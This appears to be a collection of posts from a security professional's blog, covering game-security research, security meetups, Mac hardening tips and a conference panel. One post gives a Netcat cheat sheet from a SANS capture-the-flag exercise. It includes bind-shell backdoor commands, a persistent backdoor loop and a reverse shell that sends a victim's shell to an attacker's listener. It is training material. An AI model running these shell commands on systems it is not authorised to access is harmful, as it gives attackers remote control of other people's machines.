How to rescue orcs and spaceships

Hello, my name is Scott, and I'm a gamer. Sometimes it keeps me up way too late at night, but I care about my pretend space ships and the billions of Interstellar Kredits I've earned with them, and I'd be pissed if something happened to them.

A bit nerdy I realize, even for an information security blog, but it's true. There's no way to deny it, I do enjoy my online games. The fact is though I'm far from alone. Millions of people have been getting into one of the many massive multiplayer online games, from World of Warcraft to Second Life, from Lord of the Rings to EVE Online. Millions of people have invested incredible (some would probably say insane) numbers of hours to their wizards, pod pilots, hobbits, and a variety of other characters, constituting a huge investment of both time and money ($15 dollars a month adds up). This has become my motivation as I decided to get my GIAC Certified Incident Handler Gold certification as the focus of my practical.

I've been fascinated by the numerous security exploits in various online games. From EVE Online's database hack to Charlie Miller & Dino Dai Zovi's Second Life exploit it's interesting the unique factors that go into handling attacks in multiplayer online games. On one hand it's very much like a real economy, characters have assets, experience; money of some kind, and yet very much different (you can't exactly roll back a week of financial transactions in the real world).

As a result I've chosen to make my practical for getting my GCIH Gold certificate a study on Incident Handling in online games focused on case studies of actual handling by various game operations teams. Here's my abstract:

While generalized incident handling practices are essential to any system or network they do not always meet the needs of specialized systems. These systems have needs that go above and beyond the usual, and must be handled with unique attention to specific hosts, their functions, interactions, and overall system architecture. However in these specialized systems with similar functions there may be a way to generalize even the specialized requirements.

As massive multiplayer online gaming (MMORPG) continue to grow, through games like World of Warcraft, Second Life, and EVE Online, the amount of money being funneled into them grows as well. Where the money goes so do the criminals and as such online games are increasingly coming to light as targets for malicious attackers. Whether attacking for financial gain or to simply gain the upper hand in gameplay more and more vulnerabilities are being discovered and and exploited in online games.

MMORPGs are unique environments; worlds with their own economies and populations, players with their own experiences and assets, all of which are unique and important to the users who have invested hours upon hours into their virtual personas. This combination and complexity leads to creating vibrant and unique environments that make these games interesting to play, but also create a nightmare tradeoffs in the event that an incident handler must respond to in the event of a compromise.

This leads to a need for unique handling of incidents and thus a unique set of processes to be followed. This does not supersede the generalized handling guidelines, nor could it be completed comprehensive, but there can be a generalized incident handling guidelines for online games, a superset of generalized incident handling guidelines, such as those taught in the SANS 504 course.

To this end I would like to research and develop such a set of specialized handling guidelines, based on the proven general handling techniques from SANS, for consideration of incident handlers working on massive multiplayer online games. These will focus on the unique challenges and options available to handlers in online games, and will be based in large part from case studies of how such incidents have already been handled in current online games. Additionally it will include a survey of major online games, trying to gain as much insight as possible into how they currently structure their handling, in order to add as much real world experience into this effort as possible.

Even though it results in writing a paper and being uber-whitehat I'm kind of excited about writing this paper. Looking at attacking/defending online games is just beginning to get attention. That is somewhat surprising in itself since the online gaming industry is already doing billions in dollars yearly and continues growing. Nothing is quite as much fun as breaking new ground.

So now for you, my readers, I have a request: What are your thoughts and insights, on my abstract for my paper and on the topic in general. I'm very eager to hear what you have to say. Feel free to leave comments, send email (scott.roberts[at]vulnerableminds[dot]com), send a carrier pidgion, I'm interested to hear what you have to say.

All the networking you could need: Netcat

So my SANS course this past week culminated today with a nice game of capture the flag. While not Defcon caliber it ended up being quite a lot of fun, especially for a game that only could last six hours, and did a fantastic job of bringing the course together. We learned a lot of tools during the class and playing scenario based ctf brought it all together as many of them were used during the game. Mostly we focused the old favorites: NMap, Nessus, John the Ripper; the kinda tools that have been around forever, and for good reason.

We focused mainly on another tool, one I'd known but used little. Called the "network swiss-army knife" Netcat proved, as we were promised by Ed, the most useful tool of the whole course. Netcat does just about everything. Yes, I know, if you've been in networking or security for any amount of time you're asking how I'd missed that, I hadn't, but practical use is something else. There's no doubt it's one of the most useful tools a network admin, security engineer, or hacker could ever want. So just for general consumption, and for myself, I'm posting the cheat sheet I used during our class CTF competition (my team came in 3rd of around 50 in case you were wondering) just to get any other Netcat neophytes started and possible remind some old hands of some fun tricks:

Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]

Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]

Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe

Persistant Backdoor:
while [ 1 ]; nc -l -p [port] -e /bin/sh; done

Reverse Shell
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]

Backdoor Client:
nc [server ip] [port]

Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0backpipe

Traffic Replay:
nc [targetip] [port] < [filename]

A special thanks to David "The Canadian Invasion" and Josh (it's a d, not an 8); great team fellas, it was a pleasure.

At least we're learning

I've spent the past few days taking the SANS 504 course: Hacking Techniques, Exploits, and Incident Handling. I was lucky enough to have the course creator, Ed Skoudis, as my course instructor. I don't know if I know anyone who seems to have Ed's combination of breadth and depth in the information security field. I guess that's how you become one of the senior handlers at the SANS Internet Storm Center.

I plan on doing a write up of my class and what the Vulnerable Minds have been up to for the past few weeks. A short update:

• I've been in training, busy at work, and abusing Yahoo Pipes, something I'll write more about later.
  
• Bacchus has stopped reading anything but Snort alerts, which made Bacon a bit anxious so I think he's trying to make up some new encrypted communication channel. I may help with that a bit.
  
• ev3 has been reversing everything she gets her hands on including, I'm pretty sure, her reversing tools.
  
• No one's really sure what Narc, GPmidi, Norris, or LogicX have been doing, but thats prolly a good thing.
  
• Saijak seems to have forgotten how to use a computer, though with good reason.

Regardless we're all all getting stoaked for Defcon and various Minds will be making it out there Thursday and Friday. We'll be in the Riveria and around various places. More about our plans to come.

By the way check out Ed's incident handler challenges, fun stuff.

Getting Involved: CitySec, OWASP, and SUGs! O MY!

It's been an amazingly busy time for the Vulnerable Minds. Plans for Defcon, CTF, Projects, papers, all of them are sucking up time. I have had multiple blog posts in the queue waiting to be finished and posted in all their glory, but I wanted to make a quick post to highlight something that's been important to me lately.

The image of the lonely hacker in a basement is quickly disproved as soon as you meet the very social characters that make up most of the hacking community. As happy as they are sitting around hacking on a neat piece of code they're just as happy going out for a beer and talking about that piece of code with others who share they're interests. Any conference is as much about the old friends you meet up with and the new friends you'll make as it is about the technical knowledge you'll gain.

Cons are, depending on your travel schedule and availability, few and far between for most and as a result smaller interest groups have been forming all over the country to support the desire many hackers/infosec professionals have to mix with their peers, share ideas, network, socialize, and just generally cause trouble. Much like 2600 a few years ago these groups seek to give people those opportunities.

Thomas Ptacek has been a huge proponent of these groups, and as such has organized CitySec, a small bulletin board meant to help form and nurture such groups, which I've been happy to be involved in, advocating a Washington DC meetup. Well before the CitySec site was even live Richard Beijtlich, along with other security professionals, started NoVASec (Northern Virginia) as a group for those interested in pure security, and less interested in discussing their CISSP number and GIAC scores and more into talking about what they're actually doing, could meet and talk about security. NoVASec has been excellent, just a bit of a stretch to get to as it's usually fairly far outside Washington DC proper.

Many other groups are also meeting regularly. OWASP has regular meetings, such as those in Washington DC, in various cities for developers, admins, and security folks interested in webapp security. For those more of the CISSP/Security Management mindset there are groups like ISSA-NoVA. The black or grey hat oriented crowd still has more than a few chapters of 2600 that still seem to meet, though I gather they're waning a bit. I'm also known to show up at a Snort Users Group meeting or two, though sadly the NoVA group hasn't had a meeting in a few months. Even many colleges are getting involved, with groups like the Penn State Information Assurance Club, and a similar club at RIT who's name I completely fail to remember.

I guess what I'm trying to say is that it's great the community that's coming up around various areas of the security field, and I've been happy, and encourage others in the security community, to get involved. I speak from experience when I say many of them are just as much fun as the larger conferences, and make great places to make new friends, make contacts, have a good beer, and occasionally learn something.

Time for a Tango

Well I've had a number of people curious about Project Tango. It's been going for a little over a week now, much of the initial work has been completed, and now I'm in the process of tuning some of the back end pieces for finalization and release.

So at this point I'm asking for some help, and in the process am going to give away a few things about the project, so here ya go:

• Are you a security professional who's an information junkie? Shoot me an email and let me know what you look for in getting your fix. What sites you read, what information you want, what information you don't want, and if you'd be interested in the Tango Beta.
  
• Are you a security professional using RSS to feed your information needs, whether addict level or more of a recreational RSS user? Shoot me an email, pet peeves, wants, information you don't or can't get via RSS, and if you'd be interested in the Tango Beta.
• Are you just really curious about what Project Tango is and want to make a compelling case to get in on the beta? Shoot me an email.
  

All email can be sent to tango.beta@vulnerableminds.com and we'll set you up for an early look at Project Tango.

A Safer Apple Experience per Grandma Roberts

In these days where everyone is getting worked up over OS X vulnerabilities it's somewhat easy to not know quite how to respond. I love my grandmother partially because even though she may not read all the warnings on SANS Internet Storm Center or read John Grubers surprisingly enjoyable and fair interview with Dino Dia Zovi she will email me anything she sees on CNN.com or gets via email about computer security. It's really quite touching and means a lot that she cares enough to take an interest in what I do.

It also throws some things into a different perspective for me. I often ask myself how this, be it a new vulnerability or defensive technology, would impact my grandmother. Now I've heard of this technique used to shift paradigms and gain a better understanding of a technology, but for me it's also protection, since I never know when my next call to Grandma could turn into "So Scott, is my Mac going to get broken into?"

What can I say? My grandma is a proactive person. It puts a lot of pressure on a guy. I'm used to explaining the newest vulnerabilities, exploits, worms, and attack techniques to a cadre of some of the finest information security analysts in the world. I'm used to producing technical write ups that go to highly skilled information security teams all over the world. Explaining how Dino D's exploit will impact my grand mother? Much more complicated. It can't be a "O don't worry, it'll be fine Grandma, I promise." No sir. Last time I tried that was over a printer, and so insistent was my grandmother to get it sorted out herself that I ended up wearing half a cartridge of printer ink. So I have to be prepared if Grandma gets wind of this to not just to explain whats going on and it's impact, but also how grandma can mitigate the issue for herself.

I figure such things might also be useful to the community in general. Perhaps you have a grandparent or parent with a similar iron will and determined interest. Perhaps you're just curious. Here goes.

Scott's Guide to Securing Grandmas Mac:

• Disable the automatic "Open 'Safe' files after download." in Safari.
  
• Disable Java in Safari.
• Turn on the Firewall.
• Stop using the Administrative Account for day to day stuff.
• Use strong passwords on all user accounts.
• Give Keychain a different password than your user password.
  
• Turn on Filevault.
  

There ya go. Thats the basics, as per Scott Roberts and, even though he may not remember it, Timothy Martin. Most of those steps, though very similar to those Dino himself recommended, were pulled from a presentation Tim and I gave as the Security Geniuses for the Penn State Mac Users Group more than two years ago. Oddly enough they're still relevant. Some things never change.

Not enough for you? You want more Mac security goodness? O well I've got that too:

• Want the next step up? Check out Apple's own Tiger Security Config (PDF) for a more in depth look at how to secure OS X.
• Want most of that fun without all the reading? If you know your system well then you can get a lot of automated security goodness out of Bastille for OS X. Jay Beale is a smart cookie.
• Not enough? My my, feeling ambitious, well if you want to lock your OS X down to National Security Agency Standards (something I refer as a Paperweight Lockdown) then check out the NSA's own Security Configuration Guide for OS X.

There ya go. That's four different ways to lock down your Mac. Are they perfect? No, not quite, but as fellow Vulnerable Mind Rolf constantly says "You're only 'secure' in a single moment. Staying secure is a process." Wise words from the Vulnerable Minds elder.

My Lunchtime Hack

If you're anything like me and you have a lot on your plate at work you may be inclined, as I often am, to take lunch at your desk. It's a common thing and often lets me get extra things accomplished without staying later than I already do. Still there is something to relaxing a bit away from the office when I usually go out to lunch.

I've since found a respite to go with whatever I packed for lunch. At the recommendation of al3x I started checking out Google's TechTalks. Described by Google as being "...designed to disseminate a wide spectrum of views on topics ranging from Current Affairs, Science, Engineering, Humanities, Business, Law, Entertainment, Medicine, and the Arts." and lives up to it. More than a few are even security related, and not just any script kiddies.



So I recommend getting your sandwhich/salad/whatever, putting on some headphones, and really learning something next time you have a few minutes.

Speakin' at Shmoocon

Well, it's official now. From Shmoocon.org:

A Plenary Session on the Security and Social Impact of the One Laptop Per Child program

The Children's Machine, also known as the XO-1 and previously as the $100 Laptop, is a low-cost, power-efficient and durable machine developed by faculty members of the MIT Media Lab at the One Laptop per Child non-profit organization (OLPC). The laptop's purpose is to redefine learning for children in developing countries, particularly those living in the most remote areas and in the poorest of countries, by providing them with access to knowledge and modern forms of education. The laptops contain flash memory instead of hard drives and use a custom operating system based on Fedora Core Linux, which includes a new security architecture called Bitfrost. They are built to utilize wireless mesh networking, a form of mobile ad-hoc networking, to allow machines to communicate without requiring configuration by the user. The laptops will be sold to governments and issued to children by schools on the basis of one laptop per child.

What may be the consequences of such a massive distribution of computers to children in developing nations? A much larger Internet population in a few short years appears to be a certainty. Will tens or hundreds of millions of computers running Linux drastically alter the computer security landscape? What is the potential for the laptops to be abused by criminals or closed and oppressive governments? And how will the Internet affect millions of children who find themselves with access to a world decades ahead of their own culture?

Bio: Sean Coyne

Beginning his career as the only Business School member of Penn State's NSA Center for Information Assurance Excellence, Sean is now is a sought after consultant at Booz Allen Hamilton specializing in Information Security for government clients. Sean's technical know-how coupled with a big picture view has led him to help found the Vulnerable Minds think tank, studying the impact of information security on society.

Bio: Ivan Krstic

LiveJournal doesn't have an angry mood anymore, as Ivan Krstić used it all up. Ivan has been angry on all seven continents.

Bio: Jason Scott

Jason Scott runs TEXTFILES.COM, an online collection of the last 30 years of Bulletin Board System-era history, files and artifacts. He is also the director of "BBS: The Documentary" (www.bbsdocumentary.com), a 3-DVD, 8-episode documentary about the BBS, a project 4 years in the making. He has begun production on GET LAMP (www.getlamp.com), a documentary on text adventures. He speaks on topics of computer history and social commentary at various conferences, including Shmoocon 2006, where he presented a history of hacker conferences. Jason currently lives in Massachusetts, and is secretly in love with Bruce Potter.

Bio: Scott Roberts

An up and coming member of the DC InfoSec community. Scott began his interest in Information Security trying to get access to the Internet in 9th grade computer classes and it has lead him to a position as a Global Security Analyst at Symantec Managed Security Services. Along with Vulnerable Minds, a think tank he helped found, Scott is also involved in various projects involving Snort, large scale architectures, and teaching information assurance.

I'm not gonna lie, Sean and I are stoaked. This is really shaping up to be a great talk. Jason Scott has done some really great talks before from Shmoocon, Defcon, and others. Not to mention any guy making a profession of love to Bruce Potter can't be bad at all, just amusingly crazy. He's teaming up with Sean to take a look at the sociological, economical, other -ical type things that will come up with the OLPC.

Ivan Krstic, as I have mentioned before, is an unbelievably smart gentleman, not that it's a surprise, I mean he did design Bitfrost (which will be a major topic of our panel). As much as I'm looking forward to speaking with him I'm equally excited to just get the chance to pick his brain as one of the most out of the box people in computer security.

Sean... well I see him most days, but he does have a lot of great angles on this quite interesting issue. It'll be great to hear what he comes prepared with, and even better to hear what he does with the various questions that I'm sure will be thrown his way.

As for my piece I'm planning on tag teaming the technical end of things with Ivan, looking at the implications of such technology on the security space. There is so much to cover around this, both for the kids with the laptops, the world at large, and what lessons can be learned.

It should be a great panel and I'm honored to be with such an esteemed group. So track us down at Shmoocon. I'll be doing another post on Shmoocon later this week but regardless track me down to say hi. I'll be the loud guy with the short hair and the speakers pass. If you're lucky you may even get one of the new Vulnerable Minds business cards (Thanks again Timoni! The new logos look great!).

The Early Bird

A recent Information Week article discusses the research efforts of someone near and dear to the thoughts of many Vulnerable Minds contributors: Peng Liu. Dr. Liu taught many of us during our tenure at Penn State, and was also our adviser as we started the Information Assurance club and Security Competition team. Now, he and his colleagues have filed for a patent on a new "worm stopping technology." This new creation from the department of IST "focuses on analyzing packet rate and frequency of connections, rather than signature or pattern identification."

While it is true that I was working with him at the same time as his work on this project, and I did pass on the opportunity to contribute, I still don't know much about the idea and would like to ask some probing questions to gauge community thoughts.

When I was new to the field I once asked, "Why don't we put some type of filter in place that notices a rapid escalation in traffic to or from a particular IP or port and we can stop (D)DoS attacks?" One of the replies I got was that it would quickly overwhelm the filter and we'd be back to square one. My question then is, why does the same principle not apply here? Dr. Liu points out that the Slammer worm sent out 4,000 packets per second. Part of the purpose of a worm is to cause a huge slowdown of the Internet by clogging up the tubes - I imagine these filters would take a serious hit pretty quickly.

Second, a worm does not need to send out an astronomical number of packets in a short amount of time to spread. Granted, it may not spread as quickly, but it will also pass through more quietly. Would a worm that implements this technique fall through the cracks with the new Penn State technology?

Finally, this is an anomaly based detection approach, and given the background of those involved I would guess it is more strict and mathematically based rather than AI-based (although it does mention a degree of intelligence: auto-unblocking mistakenly blocked hosts). Strict anomaly based detection is notoriously unreliable and inaccurate, what makes this any different? How is the baseline for normal established, how is the deviation measured, and perhaps most importantly, how is a "mistakenly blocked host" determined on the fly?

Note that it's not that I disagree with the premise, I'm just conducting a little vetting of the idea and attempting to learn more about it. I'm very glad to see something (perhaps) groundbreaking come from the many tens of thousands of dollars my friends and I gave to that school. Here's to not hearing the last of this. Cheers!

Quick Note

Ivan Krstic is scary smart. That is all.

I Dvorak

The grand experiment has begun. After Steve's wonderful diatribe on his good experience with Dvorak, reading the Dvorak zine (comic book style), and after hearing the same for months from al3x, I've jumped in and taken the Dvorak plunge. Friday afternoon, sitting around Murky, I pulled out my trusty little pocket knife/bottle opener and proceeded to painstakingly scrape all the relevant letters off my iBooks keyboard.

Now I don't do well with tedious things, but taking the time to scrap each little letter off all those keys was good preparation for my first few minutes of typing. I'm not going to pretend it wasn't frustrating, because it is. Everything you've been taught, everything you've trained on, all different.

Slowly though thinks got better. I visited the Dvorak zine website and found a lot of great resources that helped me through the initial stages. First I popped onto their Downloads page and downloaded the Dvorak wallpaper, which makes for a very handy reference, especially when combined with Expose.

Now it's two weeks later.....

I'm an undisciplined slob. The wallpaper is still up, my keys are letterless, but I'm still typing QWERTY. This weekend I take another crack, hopefully getting in the practice I wasn't able to get in last time. I still need to be functional at work. Hopefully my practice this weekend will help, but with so much to do it's not really the best time to start typing like a dyslexic 3rd grader. Maybe there never is a good time though.

Any tips from anyone?

The Degree Debate - Is a degree necessary in tech?

This post is a little close to the vest (is that the actual phrase?) so I'm not quite sure where it's gonna go.

As I state quite freely in my 'About Me' bit on my blog I have not yet fully completed my Bachelors of Sciences degree in Information Sciences and Technology from Penn State. It's close, only 10.5 credits away.

The Breakdown:
- 3 credits of IST331 - An Introduction to Human/Computer Interaction.
- 3 credits of either IST412 (Structured Programming) or IST413 (User Interface Design).
- 3 credits of IST440w - IST Senior Capstone Class.
- 1.5 credits of Kinesology (aka Gym Class).

I planned on finishing all these requirements this past fall, taking a ninth semester. This choice was made last spring, and a week after got my job offer from my present employer. After deliberation I decided it was too good an offer to pass up, and so here I am outside our nations capitol, doing my thing.

Ever since then everyone and their brother (or more often mother) has harped on me about how important it is that I get my degree. I hear reasons like "You're so close!" or "You'll only go so high without a degree!" or "What if you lose your job?" day in and day out. I'm already wondering how many conversations I have with my family this Christmas will be 3 minutes about my new job and 7 minutes having a family member, who most likely is making less money than I do with lower job security and multiple mouths to feed, lecturing me about how I'm in an unstable situation and need to finish my degree.

The more I think about it I just want to turn to them all and ask "Do I really? I'm not so sure I really do." Honestly I'm not convinced. I have a few reasons for this. The computer industry is not the business industry of the 1980s. A Bachelors degree is not a magic ticket. While there are many talented people in this business that have degrees there are nearly as many equally talented people who don't have them. Nicholas Negroponte is building his own computer to change the world, and he has a PhD. Bill Gates and Steve Jobs also built their own computers that changed the world, and they were drop outs. Bruce Schneier has a Masters in computer science and is (or was depending on peoples opinions) a leader in the security field and holds a Masters from American University. H.D. Moore is also a leader of the security field and as far as I can tell never went to college at all. Even closer to home I have good friends who are leaders in the computer security world, some with degrees, many without.

Since it seems to have little to do with my overall success in my chosen field I always question what will a degree do to benefit me? If you scroll back up and look again at the classes I'm going to have to take I think you'll agree that they aren't really relevant to my career path. IST440w especially seems stupid, since the whole point is to prove you can survive in the business world. Guess what, I think I'll be ok. Maybe it's the gym class that I need.

Now that I've ranted enough about this I'm going to admit that I do plan to finish my degree soon. Between the combined forces of being so close, having an employer who will pay for it, the desire to be a professor someday (and thus need PhD to go with a BS), and my parents wishes are too much for me to fight against. I'm still not convinced it's necessary, nor a real boon in the InfoSec/Computer field anyway.

I'd love to hear various peoples thoughts on this. Do you think a degree has or will help you? What skills do you think you gained in an educational environment that will help you in business? What gym class should I take? These are all important question, and I hope some of you, my readers, will take the time to answer them.